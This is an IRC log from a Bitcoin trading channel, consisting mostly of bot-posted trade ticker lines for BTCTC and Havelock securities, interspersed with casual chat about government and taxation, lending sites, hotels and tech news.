[BTCTC] [BTCGARDEN] 9 @ 0.016 = 0.144 BTC [+] Aug 09 17:25:16 [BTCTC] [BTCGARDEN] 51 @ 0.016 = 0.816 BTC [+] Aug 09 17:25:17 [BTCTC] [BTCGARDEN] 500 @ 0.016 = 8 BTC [+] Aug 09 17:25:19 [HAVELOCK] [SMG] 4 @ 0.000237 = 0.0009 BTC [+] Aug 09 17:25:27 we're discussing this from the perspective of law and the courts, not from the perspective of the soviet administrative apparatus. Aug 09 17:26:26 mircea_popescu: you might as well speak of Soviet laws and courts re: how that country was actually run. Aug 09 17:26:51 can you effectively separate the value/role of the government infrastructure from barters? Aug 09 17:27:04 ThickAsThieves we can. let the government dissapear. Aug 09 17:27:07 problem solved. Aug 09 17:27:12 asciilifeform that's a point, actually. Aug 09 17:27:47 you desire a world without governments then? Aug 09 17:28:02 the point is that the people are sovereign and the government an intermeddler, not the other way around. Aug 09 17:28:13 consequently, if the government doesn't like the deal the people are offering it it may stfu and not take it. Aug 09 17:28:20 NOT the other way around, emphatically so. Aug 09 17:28:29 let it take its infrastructure and go away. Aug 09 17:28:52 so the issue is that we gave them too much power and ability to give themselves more Aug 09 17:28:58 in nucet. Aug 09 17:29:28 ah, but at present the best infrastructure is the one built for 'persuasion' of the subjects. and liquidation, if required. the king can always import new ones. Aug 09 17:29:40 that last bit is actually happening over here Aug 09 17:29:46 to get back to the above, the problem of separating govt infrastructure from barter exchanges is wholly the government's. Aug 09 17:29:51 [HAVELOCK] [XBOND] 1 @ 0.00104688 BTC [+] Aug 09 17:30:33 asciilifeform this theory is completely false. you can't pay the good ones you lose with even legions of the shitty ones you get. Aug 09 17:30:37 i'm with you Aug 09 17:30:40 remember these fellows? http://original.antiwar.com/wp-content/uploads/2013/04/923074_10151463429718859_2120246264_n.jpg Aug 09 17:30:45 how do you ask them to 'go away' ? Aug 09 17:31:10 if the gov needs tax to do its job, it doesnt need 5000 ways to tax you Aug 09 17:31:16 just to find the best way Aug 09 17:31:17 [BTCTC] [ASICMINER-PT] 1 @ 3.897 BTC [-] Aug 09 17:31:18 asciilifeform they'll go away once they have no more money to pay for gas. Aug 09 17:31:36 [BTCTC] [TAT.ASICMINER] 10 @ 0.03897 = 0.3897 BTC [+] Aug 09 17:31:48 ThickAsThieves that's exactly the point. it shall be choked into submission. like it or not, struggle as it might. Aug 09 17:31:53 coinflow.co is down? Aug 09 17:32:02 [BTCTC] [LABCOIN] 10 @ 0.001299 = 0.013 BTC [+] Aug 09 17:32:20 mircea_popescu: what leads you to think that they won't be immediately replaced by very similarly-equipped people who can afford gas? Aug 09 17:32:22 [BTCTC] [TAT.ASICMINER] 6 @ 0.03897 = 0.2338 BTC [+] Aug 09 17:32:24 [BTCTC] [TAT.ASICMINER] 14 @ 0.03898 = 0.5457 BTC [+] Aug 09 17:32:24 firsthousefinanc ya Aug 09 17:32:36 [BTCTC] [BTC-BOND] 2 @ 0.009999 = 0.02 BTC [+] Aug 09 17:32:41 hope they didn't scam me on the btcjam loan Aug 09 17:32:45 asciilifeform because what they do is not worth money. Aug 09 17:32:59 firsthousefinanc you use btcjam, you get what you get. Aug 09 17:33:00 [BTCTC] [LABCOIN] 6 @ 0.001296 = 0.0078 BTC [-] Aug 09 17:33:24 i remember when i started my first business, and i learned that *I* had to spend money/time to account for collecting Sales Taxes, and how I thought it was absurd that I had to collect money on behalf of the gov. They even give a piddly discount to the payment if you're on time. Aug 09 17:33:27 mircea_popescu: quite true, the uniforms and pomp are decorative. think of the 'Zetas' instead. more bang, fewer bucks. Aug 09 17:33:34 i haven't heard of any defaults on the otc forum since june, btcjam has really improved their shit Aug 09 17:34:04 asciilifeform i know who pays for the zetas. Aug 09 17:34:17 also notably, they're much more effectual and significantly more popular. Aug 09 17:34:48 firsthousefinanc has it ? Aug 09 17:34:58 maybe just a function of most people learning better, since earlier this eyar. Aug 09 17:35:43 ThickAsThieves yeah. you've been drafted, because "why not". Aug 09 17:36:16 [HAVELOCK] [XBOND] 1 @ 0.00104688 BTC [+] Aug 09 17:36:26 well my friend tried to apply to borrow and even after identifying his stuff he can't create a listing lol Aug 09 17:36:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.03959 = 0.9898 BTC [+] Aug 09 17:37:26 lol that's a way. Aug 09 17:38:15 [BTCTC] [ACTIVEMINING] 30 @ 0.005413 = 0.1624 BTC [-] Aug 09 17:39:41 [BTCTC] [ASICMINER-PT] 1 @ 3.898 BTC [+] Aug 09 17:41:29 [BTCTC] [LABCOIN] 120 @ 0.001295 = 0.1554 BTC [-] Aug 09 17:41:30 [BTCTC] [LABCOIN] 880 @ 0.001296 = 1.1405 BTC [+] Aug 09 17:41:57 http://www.youtube.com/watch?v=MbXSPacvuak Aug 09 17:41:58 Mosquito finds blood vessel - YouTube Aug 09 17:42:10 [BTCTC] [LABCOIN] 83 @ 0.001296 = 0.1076 BTC [+] Aug 09 17:43:02 [BTCTC] [ASICMINER-PT] 1 @ 3.841 BTC [-] Aug 09 17:43:03 [BTCTC] [ASICMINER-PT] 3 @ 3.84 = 11.52 BTC [-] Aug 09 17:43:57 What do you guys use for finding hotels, within the US. Aug 09 17:44:16 the internet Aug 09 17:44:22 thanks Aug 09 17:44:26 np Aug 09 17:46:32 just ask the taxi at the airport Aug 09 17:46:43 Rulother__ hotwire has great prices for last min Aug 09 17:46:51 ;;nethash Aug 09 17:46:51 384755.033778 Aug 09 17:46:56 ;;estimate Aug 09 17:46:57 Next difficulty estimate | None based on data since last change | 53748837.1434 based on data for last three days Aug 09 17:47:09 yeah looking through booking and a few others, basically last minute efforts lol Aug 09 17:47:17 [BTCTC] [TAT.ASICMINER] 66 @ 0.03959 = 2.6129 BTC [+] Aug 09 17:47:19 [BTCTC] [TAT.ASICMINER] 34 @ 0.039 = 1.326 BTC [-] Aug 09 17:47:24 lol Aug 09 17:47:24 nevermind a hotel, you can stay in a traveler's hostel for 1/8th the price Aug 09 17:47:32 Rulother__ I've gotten hilton hotels (4 star) for $75/night, I highly recommend it Aug 09 17:47:35 [BTCTC] [ASICMINER-PT] 1 @ 3.898 BTC [+] Aug 09 17:47:51 the only problem is that you can't find what hotel it is until you book it Aug 09 17:48:04 firsthousefinanc do they have bj roomservice in traveler's hostels ? Aug 09 17:48:10 [BTCTC] [ASICMINER-PT] 1 @ 3.898 BTC [+] Aug 09 17:48:27 I would pay extra Aug 09 17:48:30 plenty of hot european women staying in the US traveler's hostels Aug 09 17:48:35 [BTCTC] [ASICMINER-PT] 2 @ 3.899 = 7.798 BTC [+] Aug 09 17:48:36 [BTCTC] [ASICMINER-PT] 10 @ 3.9 = 39 BTC [+] Aug 09 17:48:37 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Aug 09 17:48:39 [BTCTC] [ASICMINER-PT] 1 @ 3.91 BTC [+] Aug 09 17:48:40 [BTCTC] [ASICMINER-PT] 1 @ 3.939 BTC [+] Aug 09 17:48:41 [BTCTC] [ASICMINER-PT] 3 @ 3.944 = 11.832 BTC [+] Aug 09 17:48:42 [BTCTC] [ASICMINER-PT] 1 @ 3.97 BTC [+] Aug 09 17:48:43 hm. Aug 09 17:48:43 [BTCTC] [ASICMINER-PT] 2 @ 3.973 = 7.946 BTC [+] Aug 09 17:48:44 [BTCTC] [ASICMINER-PT] 1 @ 3.974 BTC [+] Aug 09 17:48:45 [BTCTC] [ASICMINER-PT] 15 @ 3.975 = 59.625 BTC [+] Aug 09 17:49:11 [BTCTC] [BTC-TRADING-PT] 1 @ 0.7 BTC [+] Aug 09 17:53:12 [HAVELOCK] [XBOND] 4 @ 0.00104688 = 0.0042 BTC [+] Aug 09 17:54:07 [BTCTC] [ACTIVEMINING] 20 @ 0.005487 = 0.1097 BTC [+] Aug 09 17:54:10 [BTCTC] [BTCGARDEN] 792 @ 0.0158 = 12.5136 BTC [-] Aug 09 17:54:15 [BTCTC] [TAT.ASICMINER] 16 @ 0.039 = 0.624 BTC [-] Aug 09 17:54:17 burnside: PM? Aug 09 17:54:17 [BTCTC] [TAT.ASICMINER] 1 @ 0.03897 BTC [-] Aug 09 17:55:34 [BTCTC] [BTCGARDEN] 28 @ 0.01565 = 0.4382 BTC [-] Aug 09 17:55:35 [BTCTC] [BTCGARDEN] 172 @ 0.01564 = 2.6901 BTC [-] Aug 09 17:55:41 [HAVELOCK] [AM100] 1 @ 0.03666666 BTC [-] Aug 09 17:55:43 [HAVELOCK] [AM100] 3 @ 0.03669999 = 0.1101 BTC [+] Aug 09 17:55:46 [HAVELOCK] [AM100] 2 @ 0.0367 = 0.0734 BTC [+] Aug 09 17:55:48 [HAVELOCK] [AM100] 9 @ 0.0367 = 0.3303 BTC [+] Aug 09 17:55:50 [HAVELOCK] [AM100] 125 @ 0.0368899 = 4.6112 BTC [+] Aug 09 17:56:19 [BTCTC] [ASICMINER-PT] 1 @ 3.974 BTC [-] Aug 09 17:56:29 [HAVELOCK] [HIM] 1 @ 0.1281 BTC [-] Aug 09 17:56:31 [HAVELOCK] [HIM] 3 @ 0.128 = 0.384 BTC [-] Aug 09 17:56:33 [HAVELOCK] [HIM] 10 @ 0.127 = 1.27 BTC [-] Aug 09 17:56:35 [HAVELOCK] [HIM] 5 @ 0.1255 = 0.6275 BTC [-] Aug 09 17:56:37 [HAVELOCK] [HIM] 1 @ 0.12510001 BTC [-] Aug 09 17:56:39 [HAVELOCK] [HIM] 8 @ 0.12450001 = 0.996 BTC [-] Aug 09 17:56:41 [HAVELOCK] [HIM] 1 @ 0.1231 BTC [-] Aug 09 17:56:44 [HAVELOCK] [HIM] 21 @ 0.12200001 = 2.562 BTC [-] Aug 09 17:56:46 [HAVELOCK] [HIM] 1 @ 0.121 BTC [-] Aug 09 17:56:47 [HAVELOCK] [HIM] 3 @ 0.121 = 0.363 BTC [-] Aug 09 17:56:49 [HAVELOCK] [AM100] 2 @ 0.0368899 = 0.0738 BTC [+] Aug 09 17:57:09 [HAVELOCK] [AM100] 1 @ 0.0368899 BTC [+] Aug 09 17:57:18 [BTCTC] [TAT.ASICMINER] 67 @ 0.03955 = 2.6499 BTC [+] Aug 09 17:57:20 [BTCTC] [TAT.ASICMINER] 21 @ 0.03956 = 0.8308 BTC [+] Aug 09 17:57:44 [HAVELOCK] [AM1] 1 @ 3.809 BTC [+] Aug 09 17:59:56 [BTCTC] [BTCGARDEN] 2 @ 0.01564 = 0.0313 BTC [-] Aug 09 18:00:48 [BTCTC] [LABCOIN] 3 @ 0.001292 = 0.0039 BTC [-] Aug 09 18:00:51 [BTCTC] [LABCOIN] 1 @ 0.001291 BTC [-] Aug 09 18:02:25 [BTCTC] [TAT.ASICMINER] 2 @ 0.03953 = 0.0791 BTC [-] Aug 09 18:02:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.03954 BTC [+] Aug 09 18:03:17 [BTCTC] [BTCGARDEN] 28 @ 0.01597 = 0.4472 BTC [+] Aug 09 18:03:40 [HAVELOCK] [XBOND] 35 @ 0.00104688 = 0.0366 BTC [+] Aug 09 18:03:58 [BTCTC] [BTCGARDEN] 44 @ 0.01598 = 0.7031 BTC [+] Aug 09 18:04:17 [BTCTC] [LTC-ATF.B2] 1 @ 0.01043 BTC [-] Aug 09 18:05:35 [BTCTC] [ACTIVEMINING] 30 @ 0.005473 = 0.1642 BTC [-] Aug 09 18:05:37 [BTCTC] [ACTIVEMINING] 2 @ 0.005474 = 0.0109 BTC [+] Aug 09 18:05:38 [BTCTC] [ACTIVEMINING] 167 @ 0.005513 = 0.9207 BTC [+] Aug 09 18:05:39 [BTCTC] [ACTIVEMINING] 601 @ 0.005514 = 3.3139 BTC [+] Aug 09 18:06:09 [HAVELOCK] [XBOND] 30 @ 0.00104688 = 0.0314 BTC [+] Aug 09 18:06:27 [HAVELOCK] [XBOND] 3 @ 0.00104688 = 0.0031 BTC [+] Aug 09 18:06:40 [HAVELOCK] [XBOND] 1 @ 0.00104688 BTC [+] Aug 09 18:06:42 [BTCTC] [LABCOIN] 33 @ 0.00132 = 0.0436 BTC [+] Aug 09 18:06:42 [BTCTC] [LABCOIN] 30 @ 0.001321 = 0.0396 BTC [+] Aug 09 18:06:45 [BTCTC] [LABCOIN] 235 @ 0.001322 = 0.3107 BTC [+] Aug 09 18:06:45 [BTCTC] [LABCOIN] 96 @ 0.001342 = 0.1288 BTC [+] Aug 09 18:06:46 [BTCTC] [LABCOIN] 1711 @ 0.001343 = 2.2979 BTC [+] Aug 09 18:06:47 [BTCTC] [LABCOIN] 20 @ 0.001344 = 0.0269 BTC [+] Aug 09 18:06:48 [BTCTC] [LABCOIN] 53 @ 0.001355 = 0.0718 BTC [+] Aug 09 18:06:49 [BTCTC] [LABCOIN] 189 @ 0.001356 = 0.2563 BTC [+] Aug 09 18:07:19 yep Aug 09 18:07:53 [BTCTC] [BTC-BOND] 5 @ 0.009999 = 0.05 BTC [+] Aug 09 18:08:56 [BTCTC] [BASIC-MINING] 4 @ 0.2781 = 1.1124 BTC [+] Aug 09 18:08:58 [BTCTC] [BASIC-MINING] 1 @ 0.2782 BTC [+] Aug 09 18:08:59 [BTCTC] [BASIC-MINING] 1 @ 0.2789 BTC [+] Aug 09 18:09:00 [BTCTC] [BASIC-MINING] 2 @ 0.279 = 0.558 BTC [+] Aug 09 18:09:01 [BTCTC] [BASIC-MINING] 2 @ 0.2791 = 0.5582 BTC [+] Aug 09 18:09:42 yup Aug 09 18:09:47 mhmmm Aug 09 18:10:20 [BTCTC] [LABCOIN] 30 @ 0.001345 = 0.0404 BTC [-] Aug 09 18:10:21 [BTCTC] [LABCOIN] 235 @ 0.001346 = 0.3163 BTC [+] Aug 09 18:10:22 [BTCTC] [LABCOIN] 20 @ 0.00135 = 0.027 BTC [+] Aug 09 18:10:24 [BTCTC] [LABCOIN] 15 @ 0.001356 = 0.0203 BTC [+] Aug 09 18:11:02 [BTCTC] [KENILWORTH] 10 @ 0.0018 = 0.018 BTC [+] Aug 09 18:12:48 [BTCTC] [LABCOIN] 30 @ 0.001352 = 0.0406 BTC [-] Aug 09 18:13:13 [HAVELOCK] [SMG] 2 @ 0.000237 = 0.0005 BTC [+] Aug 09 18:13:29 I'll never understand some people and kenilworth Aug 09 18:13:33 [BTCTC] [LABCOIN] 30 @ 0.001349 = 0.0405 BTC [-] Aug 09 18:14:07 [BTCTC] [RSM] 2 @ 0.0123 = 0.0246 BTC [+] Aug 09 18:14:29 [BTCTC] [LABCOIN] 28 @ 0.001346 = 0.0377 BTC [-] Aug 09 18:15:14 [HAVELOCK] [AM1] 3 @ 3.805 = 11.415 BTC [-] Aug 09 18:16:09 there's worse fates. Aug 09 18:17:13 [BTCTC] [BTCGARDEN] 300 @ 0.01598 = 4.794 BTC [+] Aug 09 18:19:23 [BTCTC] [BTCGARDEN] 388 @ 0.016 = 6.208 BTC [+] Aug 09 18:19:47 [BTCTC] [ASICMINER-PT] 1 @ 3.972 BTC [-] Aug 09 18:19:50 [HAVELOCK] [AM100] 10 @ 0.0369 = 0.369 BTC [+] Aug 09 18:21:39 https://bitcointalk.org/index.php?topic=270625.msg1521109;topicseen#new Aug 09 18:21:45 [BITCOINBOURSE.EU/BICOINBURZA.COM] IPO SYSTEM SHARES Aug 09 18:21:55 [BTCTC] [BTCGARDEN] 400 @ 0.01601 = 6.404 BTC [+] Aug 09 18:21:56 [BTCTC] [BTCGARDEN] 100 @ 0.01602 = 1.602 BTC [+] Aug 09 18:21:57 [BTCTC] [BTCGARDEN] 100 @ 0.01602 = 1.602 BTC [+] Aug 09 18:21:58 [BTCTC] [BTCGARDEN] 1476 @ 0.01603 = 23.6603 BTC [+] Aug 09 18:21:59 [BTCTC] [BTCGARDEN] 1350 @ 0.01603 = 21.6405 BTC [+] Aug 09 18:22:01 [BTCTC] [BTCGARDEN] 2274 @ 0.01604 = 36.475 BTC [+] Aug 09 18:22:10 "We would like to present competitive, secure and highly professional solution for buying and selling of bitcoins, especially in Europe. There is a plenty of potential for future growth and we would like to be helpful with the general adoption of virtual currencies. Although it is premature to estimate income for the several months after the launch of the system, we would like to get Aug 09 18:22:10 weekly turnover over 1.000 BTC till the end of 2013 and 10.000 BTC per week till the summer 2014. " Aug 09 18:23:03 lolk Aug 09 18:23:43 [BTCTC] [ASICMINER-PT] 1 @ 3.854 BTC [-] Aug 09 18:23:44 [BTCTC] [ASICMINER-PT] 2 @ 3.853 = 7.706 BTC [-] Aug 09 18:23:46 [BTCTC] [ASICMINER-PT] 3 @ 3.85 = 11.55 BTC [-] Aug 09 18:23:46 [BTCTC] [ASICMINER-PT] 10 @ 3.802 = 38.02 BTC [-] Aug 09 18:23:47 [BTCTC] [ASICMINER-PT] 3 @ 3.801 = 11.403 BTC [-] Aug 09 18:23:48 [BTCTC] [ASICMINER-PT] 10 @ 3.8 = 38 BTC [-] Aug 09 18:23:49 [BTCTC] [ASICMINER-PT] 10 @ 3.8 = 38 BTC [-] Aug 09 18:24:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [-] Aug 09 18:25:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.03949 BTC [-] Aug 09 18:26:30 [BTCTC] [LABCOIN] 1 @ 0.00133 BTC [-] Aug 09 18:27:52 Charlie Shrem explains bitcoin to people in blazers http://www.youtube.com/watch?v=AWMtcmNTzGg#at=358 Aug 09 18:28:53 How NatGeo uses drones: http://cdn1.sbnation.com/entry_photo_images/8728563/lions_MM7947_0813_003_verge_super_wide.jpg Aug 09 18:30:08 http://www.bbc.co.uk/news/science-environment-23623601 Aug 09 18:30:11 BBC News - Bacteria give lessons in investment economics Aug 09 18:30:16 "Colonies of bacteria balance growth against risk, just like financial investors, ecologists have found." Aug 09 18:31:01 [BTCTC] [TAT.ASICMINER] 8 @ 0.03947 = 0.3158 BTC [-] Aug 09 18:31:05 "just like financial investors" ?! in what world ?! Aug 09 18:32:57 [BTCTC] [BASIC-MINING] 1 @ 0.2791 BTC [+] Aug 09 18:33:43 [BTCTC] [ACTIVEMINING] 15 @ 0.005486 = 0.0823 BTC [-] Aug 09 18:33:44 [BTCTC] [ACTIVEMINING] 68 @ 0.005487 = 0.3731 BTC [+] Aug 09 18:33:46 [BTCTC] [ACTIVEMINING] 5 @ 0.00549 = 0.0275 BTC [+] Aug 09 18:33:47 [BTCTC] [ACTIVEMINING] 107 @ 0.005513 = 0.5899 BTC [+] Aug 09 18:33:48 [BTCTC] [ACTIVEMINING] 5 @ 0.005514 = 0.0276 BTC [+] Aug 09 18:35:23 [BTCTC] [BTCGARDEN] 150 @ 0.01598 = 2.397 BTC [-] Aug 09 18:36:49 [BTCTC] [DMS.PURCHASE] 2000 @ 0.02822 = 56.44 BTC [-] Aug 09 18:38:07 [BTCTC] [BASIC-MINING] 2 @ 0.2791 = 0.5582 BTC [+] Aug 09 18:38:08 [BTCTC] [BASIC-MINING] 1 @ 0.2799 BTC [+] Aug 09 18:38:09 [HAVELOCK] [AM100] 1 @ 0.03699 BTC [+] Aug 09 18:38:11 [BTCTC] [BASIC-MINING] 1 @ 0.28 BTC [+] Aug 09 18:38:12 [BTCTC] [BASIC-MINING] 2 @ 0.28 = 0.56 BTC [+] Aug 09 18:40:34 [HAVELOCK] [XBOND] 35 @ 0.00104688 = 0.0366 BTC [+] Aug 09 18:44:46 [BTCTC] [BASIC-MINING] 1 @ 0.27 BTC [-] Aug 09 18:45:34 [HAVELOCK] [XBOND] 557 @ 0.00104688 = 0.5831 BTC [+] Aug 09 18:47:29 [BTCTC] [LABCOIN] 60 @ 0.001333 = 0.08 BTC [+] Aug 09 18:54:13 [BTCTC] [BASIC-MINING] 1 @ 0.2793 BTC [+] Aug 09 18:54:14 [BTCTC] [BASIC-MINING] 1 @ 0.2801 BTC [+] Aug 09 18:54:32 [BTCTC] [LABCOIN] 30 @ 0.001313 = 0.0394 BTC [-] Aug 09 18:54:34 [BTCTC] [LABCOIN] 20 @ 0.001312 = 0.0262 BTC [-] Aug 09 18:55:15 [BTCTC] [NASTY-PT] 15 @ 0.004166 = 0.0625 BTC [-] Aug 09 18:56:54 [BTCTC] [ACTIVEMINING] 13 @ 0.00549 = 0.0714 BTC [-] Aug 09 18:56:55 [BTCTC] [ACTIVEMINING] 133 @ 0.005499 = 0.7314 BTC [+] Aug 09 18:56:56 [BTCTC] [ACTIVEMINING] 354 @ 0.0055 = 1.947 BTC [+] Aug 09 18:57:55 [BTCTC] [ACTIVEMINING] 1000 @ 0.0051 = 5.1 BTC [-] Aug 09 18:58:55 boom/bust cycle, ok... Aug 09 18:59:01 but petri dish as a trading floor? Aug 09 18:59:07 omg Aug 09 18:59:53 [HAVELOCK] [XBOND] 4 @ 0.00104688 = 0.0042 BTC [+] Aug 09 19:00:23 [BTCTC] [ACTIVEMINING] 30 @ 0.005413 = 0.1624 BTC [+] Aug 09 19:00:25 [BTCTC] [ACTIVEMINING] 38 @ 0.005412 = 0.2057 BTC [-] Aug 09 19:01:22 [BTCTC] [ACTIVEMINING] 30 @ 0.005415 = 0.1625 BTC [+] Aug 09 19:01:24 [BTCTC] [ACTIVEMINING] 90 @ 0.0054 = 0.486 BTC [-] Aug 09 19:01:25 [BTCTC] [ACTIVEMINING] 3 @ 0.005311 = 0.0159 BTC [-] Aug 09 19:01:27 [BTCTC] [ACTIVEMINING] 16 @ 0.00531 = 0.085 BTC [-] Aug 09 19:01:28 [BTCTC] [ACTIVEMINING] 1 @ 0.0053 BTC [-] Aug 09 19:01:29 [BTCTC] [ACTIVEMINING] 4 @ 0.005276 = 0.0211 BTC [-] Aug 09 19:01:30 [BTCTC] [ACTIVEMINING] 20 @ 0.005275 = 0.1055 BTC [-] Aug 09 19:01:30 [BTCTC] [ACTIVEMINING] 178 @ 0.005273 = 0.9386 BTC [-] Aug 09 19:01:31 [BTCTC] [ACTIVEMINING] 380 @ 0.005272 = 2.0034 BTC [-] Aug 09 19:01:33 [BTCTC] [ACTIVEMINING] 278 @ 0.005271 = 1.4653 BTC [-] Aug 09 19:06:42 [BTCTC] [DMS.MINING] 10 @ 0.004678 = 0.0468 BTC [-] Aug 09 19:07:34 [BTCTC] [DMS.MINING] 30 @ 0.004575 = 0.1373 BTC [-] Aug 09 19:08:14 [BTCTC] [BTCGARDEN] 36 @ 0.01598 = 0.5753 BTC [-] Aug 09 19:10:10 [BTCTC] [DMS.SELLING] 3 @ 0.024 = 0.072 BTC [+] Aug 09 19:10:24 [BTCTC] [TAT.ASICMINER] 50 @ 0.03886 = 1.943 BTC [-] Aug 09 19:10:25 [BTCTC] [DMS.MINING] 3 @ 0.004678 = 0.014 BTC [+] Aug 09 19:10:26 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.002 BTC [-] Aug 09 19:10:56 [BTCTC] [DMS.MINING] 10 @ 0.004575 = 0.0458 BTC [-] Aug 09 19:11:20 [BTCTC] [TAT.ASICMINER] 5 @ 0.03885 = 0.1943 BTC [-] Aug 09 19:11:38 [BTCTC] [TAT.ASICMINER] 5 @ 0.03885 = 0.1943 BTC [-] Aug 09 19:11:47 [BTCTC] [TAT.ASICMINER] 10 @ 0.03884 = 0.3884 BTC [-] Aug 09 19:12:02 [BTCTC] [BTCGARDEN] 2 @ 0.01581 = 0.0316 BTC [-] Aug 09 19:12:50 [BTCTC] [PAJKA.BOND] 2 @ 0.017 = 0.034 BTC [+] Aug 09 19:14:03 [BTCTC] [DMS.MINING] 14 @ 0.004678 = 0.0655 BTC [+] Aug 09 19:14:23 [BTCTC] [DMS.MINING] 6 @ 0.004678 = 0.0281 BTC [+] Aug 09 19:15:12 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.002008 = 0.004 BTC [+] Aug 09 19:15:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.03821 BTC [-] Aug 09 19:15:53 [BTCTC] [DMS.MINING] 20 @ 0.004575 = 0.0915 BTC [-] Aug 09 19:15:54 [BTCTC] [DMS.MINING] 2 @ 0.004575 = 0.0092 BTC [-] Aug 09 19:15:56 [BTCTC] [DMS.MINING] 4 @ 0.004574 = 0.0183 BTC [-] Aug 09 19:17:27 [BTCTC] [DMS.PURCHASE] 1 @ 0.02817 BTC [-] Aug 09 19:21:09 [BTCTC] [TAT.VIRTUALMINE] 40 @ 0.002006 = 0.0802 BTC [-] Aug 09 19:22:00 [BTCTC] [TAT.ASICMINER] 50 @ 0.03884 = 1.942 BTC [+] Aug 09 19:24:01 [BTCTC] [ACTIVEMINING] 30 @ 0.00542 = 0.1626 BTC [+] Aug 09 19:24:03 [BTCTC] [ACTIVEMINING] 68 @ 0.005421 = 0.3686 BTC [+] Aug 09 19:24:03 [BTCTC] [ACTIVEMINING] 9 @ 0.005423 = 0.0488 BTC [+] Aug 09 19:24:04 [BTCTC] [ACTIVEMINING] 143 @ 0.005496 = 0.7859 BTC [+] Aug 09 19:24:43 [BTCTC] [ACTIVEMINING] 50 @ 0.005495 = 0.2748 BTC [-] Aug 09 19:28:11 [BTCTC] [TAT.ASICMINER] 50 @ 0.03888 = 1.944 BTC [+] Aug 09 19:28:46 [BTCTC] [LABCOIN] 2 @ 0.001322 = 0.0026 BTC [+] Aug 09 19:28:59 [BTCTC] [ACTIVEMINING] 1 @ 0.00548 BTC [-] Aug 09 19:33:34 [BTCTC] [LABCOIN] 8 @ 0.001346 = 0.0108 BTC [+] Aug 09 19:34:07 [BTCTC] [ACTIVEMINING] 1 @ 0.005464 BTC [-] Aug 09 19:34:16 [BTCTC] [ACTIVEMINING] 16 @ 0.005306 = 0.0849 BTC [-] Aug 09 19:34:54 [BTCTC] [ASICMINER-PT] 1 @ 3.865 BTC [+] Aug 09 19:38:39 [HAVELOCK] [XBOND] 40 @ 0.00104688 = 0.0419 BTC [+] Aug 09 19:39:05 [HAVELOCK] [XBOND] 2 @ 0.00104688 = 0.0021 BTC [+] Aug 09 19:39:16 [HAVELOCK] [XBOND] 1 @ 0.00104688 BTC [+] Aug 09 19:47:17 kenilworth Aug 09 19:47:19 why people Aug 09 19:47:21 [BTCTC] [B.YABMC] 1 @ 0.002399 BTC [+] Aug 09 19:48:20 [BTCTC] [LABCOIN] 1 @ 0.001328 BTC [-] Aug 09 19:49:52 [BTCTC] [LABCOIN] 1 @ 0.001326 BTC [-] Aug 09 19:52:16 [BTCTC] [DMS.MINING] 1 @ 0.0044 BTC [-] Aug 09 19:52:17 [BTCTC] [DMS.MINING] 3 @ 0.004274 = 0.0128 BTC [-] Aug 09 19:52:18 [BTCTC] [DMS.MINING] 9 @ 0.00427 = 0.0384 BTC [-] Aug 09 19:52:19 [BTCTC] [DMS.MINING] 15 @ 0.00425 = 0.0638 BTC [-] Aug 09 19:52:20 [BTCTC] [DMS.MINING] 25 @ 0.0042 = 0.105 BTC [-] Aug 09 19:52:30 [BTCTC] [DMS.MINING] 2 @ 0.0042 = 0.0084 BTC [-] Aug 09 19:55:19 [HAVELOCK] [SMG] 1 @ 0.000237 BTC [+] Aug 09 19:56:11 [BTCTC] [DMS.SELLING] 17 @ 0.024 = 0.408 BTC [+] Aug 09 19:56:12 [BTCTC] [DMS.SELLING] 118 @ 0.024 = 2.832 BTC [+] Aug 09 20:04:25 [BTCTC] [ASICMINER-PT] 1 @ 3.845 BTC [-] Aug 09 20:06:34 [HAVELOCK] [XBOND] 15 @ 0.00104688 = 0.0157 BTC [+] Aug 09 20:09:47 [HAVELOCK] [XBOND] 35 @ 0.00104688 = 0.0366 BTC [+] Aug 09 20:11:56 [HAVELOCK] [AM100] 1 @ 0.0355 BTC [-] Aug 09 20:12:57 [BTCTC] [TAT.ASICMINER] 30 @ 0.03888 = 1.1664 BTC [+] Aug 09 20:13:19 [BTCTC] [ASICMINER-PT] 2 @ 3.84 = 7.68 BTC [-] Aug 09 20:14:48 http://it.slashdot.org/story/13/08/09/1419228/nsa-firing-90-of-its-sysadmins Aug 09 20:14:51 NSA Firing 90% of Its Sysadmins - Slashdot Aug 09 20:15:10 they should just fire everybody Aug 09 20:16:32 [BTCTC] [DMS.SELLING] 82 @ 0.024 = 1.968 BTC [+] Aug 09 20:16:33 [BTCTC] [DMS.SELLING] 3 @ 0.02409 = 0.0723 BTC [+] Aug 09 20:16:34 [BTCTC] [DMS.SELLING] 25 @ 0.0241 = 0.6025 BTC [+] Aug 09 20:16:35 [BTCTC] [DMS.SELLING] 50 @ 0.02419 = 1.2095 BTC [+] Aug 09 20:16:36 [BTCTC] [DMS.SELLING] 100 @ 0.0242 = 2.42 BTC [+] Aug 09 20:16:37 [BTCTC] [DMS.SELLING] 130 @ 0.02444 = 3.1772 BTC [+] Aug 09 20:18:37 [HAVELOCK] [AM1] 1 @ 3.81 BTC [+] Aug 09 20:21:39 russie is hiring Aug 09 20:22:15 [BTCTC] [TAT.ASICMINER] 8 @ 0.03888 = 0.311 BTC [+] Aug 09 20:22:47 [BTCTC] [TAT.ASICMINER] 29 @ 0.03888 = 1.1275 BTC [+] Aug 09 20:22:49 [BTCTC] [BASIC-MINING] 3 @ 0.276 = 0.828 BTC [-] Aug 09 20:23:21 [BTCTC] [BTCGARDEN] 46 @ 0.0159 = 0.7314 BTC [+] Aug 09 20:23:33 [BTCTC] [TAT.ASICMINER] 8 @ 0.03889 = 0.3111 BTC [+] Aug 09 20:23:46 [BTCTC] [LABCOIN] 16 @ 0.001346 = 0.0215 BTC [+] Aug 09 20:23:47 [BTCTC] [LABCOIN] 6 @ 0.001349 = 0.0081 BTC [+] Aug 09 20:23:48 [BTCTC] [LABCOIN] 50 @ 0.00135 = 0.0675 BTC [+] Aug 09 20:23:49 [BTCTC] [LABCOIN] 3 @ 0.001388 = 0.0042 BTC [+] Aug 09 20:23:50 [BTCTC] [LABCOIN] 24 @ 0.001389 = 0.0333 BTC [+] Aug 09 20:23:51 [BTCTC] [LABCOIN] 143 @ 0.001399 = 0.2001 